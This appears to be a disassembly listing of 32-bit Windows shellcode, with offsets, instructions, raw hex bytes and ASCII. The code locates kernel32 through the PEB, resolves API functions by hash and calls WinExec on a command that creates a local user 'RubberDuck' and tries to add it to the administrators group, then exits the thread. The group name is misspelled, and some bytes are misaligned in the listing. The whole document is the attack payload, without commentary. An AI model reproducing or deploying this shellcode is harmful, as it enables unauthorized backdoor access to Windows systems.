0x0        cld                                 \xfc                      .         
0x1        xor edx, edx                        \x33\xd2                  3.        
0x3        mov dl, 0x30                        \xb2\x30                  .0        
0x5        push dword ptr fs:[edx]             \x64\xff\x32              d.2       
0x8        pop edx                             \x5a                      Z         
0x9        mov edx, dword ptr [edx + 0xc]      \x8b\x52\x0c              .R.       
0xc        mov edx, dword ptr [edx + 0x14]     \x8b\x52\x14              .R.       
     label_0xf:
0xf        mov esi, dword ptr [edx + 0x28]     \x8b\x72\x28              .r(       
0x12       xor ecx, ecx                        \x33\xc9                  3.        
0x14       mov cl, 0x18                        \xb1\x18                  ..        
0x16       xor edi, edi                        \x33\xff                  3.        
     label_0x18:
0x18       xor eax, eax                        \x33\xc0                  3.        
0x1a       lodsb al, byte ptr [esi]            \xac                      .         
0x1b       cmp al, 0x61                        \x3c\x61                  <a        
0x1d       jl 0x21                             \x7c\x02                  |.        

0x1f       sub al, 0x20                        \x2c\x20                  ,         
     label_0x21:
0x21       ror edi, 0xd                        \xc1\xcf\x0d              ...       
0x24       add edi, eax                        \x03\xf8                  ..        
0x26       loop 0x18                           \xe2\xf0                  ..        
0x28       cmp edi, 0x6a4abc5b                 \x81\xff\x5b\xbc\x4a\x6a  ..[.Jj    
0x2e       mov ebx, dword ptr [edx + 0x10]     \x8b\x5a\x10              .Z.       
0x31       mov edx, dword ptr [edx]            \x8b\x12                  ..        
0x33       jne 0xf                             \x75\xda                  u.        

0x35       mov edx, dword ptr [ebx + 0x3c]     \x8b\x53\x3c              .S<       
0x38       add edx, ebx                        \x03\xd3                  ..        
0x3a       push dword ptr [edx + 0x34]         \xff\x72\x34              .r4       
0x3d       mov edx, dword ptr [edx + 0x78]     \x8b\x52\x78              .Rx       
0x40       add edx, ebx                        \x03\xd3                  ..        
0x42       mov esi, dword ptr [edx + 0x20]     \x8b\x72\x20              .r        
0x45       add esi, ebx                        \x03\xf3                  ..        
0x47       xor ecx, ecx                        \x33\xc9                  3.        
0x49       inc ecx                             \x41                      A         
0x4a       lodsd eax, dword ptr [esi]          \xad                      .         
0x4b       add eax, ebx                        \x03\xc3                  ..        
0x4d       db 0x81                             \x81                      .         
     label_0x5c:
0x4e       8GetPu ; string                    \x38\x47\x65\x74\x50\x75            
0x54       db 0xf4 (!)                        \xf4                      .         
0x55       db 0x81 (!)                        \x81                      .         
0x56       db 0x78 (!)                        \x78                      x         
0x57       db 0x04 (!)                        \x04                      .         
0x58       rocAu ; string                     \x72\x6f\x63\x41\x75                
0x5d       jmp 0xffffffe0                      \xeb\x81                  ..        

0x5f       db 0x78 (!)                        \x78                      x         
0x60       db 0x08 (!)                        \x08                      .         
0x61       ddreu ; string                     \x64\x64\x72\x65\x75                
0x66       db 0xe2 (!)                        \xe2                      .         
0x67       db 0x49 (!)                        \x49                      I         
0x68       mov esi, dword ptr [edx + 0x24]     \x8b\x72\x24              .r$       
0x6b       add esi, ebx                        \x03\xf3                  ..        
0x6d       mov cx, word ptr [esi + ecx*2]      \x66\x8b\x0c\x4e          f..N      
0x71       mov esi, dword ptr [edx + 0x1c]     \x8b\x72\x1c              .r.       
0x74       add esi, ebx                        \x03\xf3                  ..        
0x76       mov edx, dword ptr [esi + ecx*4]    \x8b\x14\x8e              ...       
0x79       add edx, ebx                        \x03\xd3                  ..        
0x7b       Rhxec ; string                     \x52\x68\x78\x65\x63                
0x80       db 0x01 (!)                        \x01                      .         
0x81       db 0xfe (!)                        \xfe                      .         
0x82       db 0x4c (!)                        \x4c                      L         
0x83       db 0x24 (!)                        \x24                      $         
0x84       db 0x03 (!)                        \x03                      .         
0x85       hWinETS ; string                   \x68\x57\x69\x6e\x45\x54\x53          
0x8c       call edx                            \xff\xd2                  ..        
0x8e       push 5                              \x6a\x05                  j.        
0x90       jmp 0xb5                            \xeb\x23                  .#        

     label_0x92:
0x92       call eax                            \xff\xd0                  ..        
0x94       push 0x1737365                      \x68\x65\x73\x73\x01      hess.     
0x99       mov ebx, edi                        \x8b\xdf                  ..        
0x9b       dec byte ptr [esp + 3]              \xfe\x4c\x24\x03          .L$.      
0x9f       hProchExitT ; string               \x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54          
0xaa       push dword ptr [esp + 0x1c]         \xff\x74\x24\x1c          .t$.      
0xae       call dword ptr [esp + 0x1c]         \xff\x54\x24\x1c          .T$.      
0xb2       push edi                            \x57                      W         
0xb3       call eax                            \xff\xd0                  ..        
     label_0xb5:
0xb5       call 0x92                           \xe8\xd8\xff\xff\xff      .....     
0xba       cmd.exe /c net user RubberDuck mudbath /add && net localgroup admtors RubberDuck /add ; string\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x52\x75\x62\x62\x65\x72\x44\x75\x63\x6b\x20\x6d\x75\x64\x62\x61\x74\x68\x20\x2f\x61\x64\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x74\x6f\x72\x73\x20\x52\x75\x62\x62\x65\x72\x44\x75\x63\x6b\x20\x2f\x61\x64\x64          
0x10f      db 0x00 (!)                        \x00                      .         
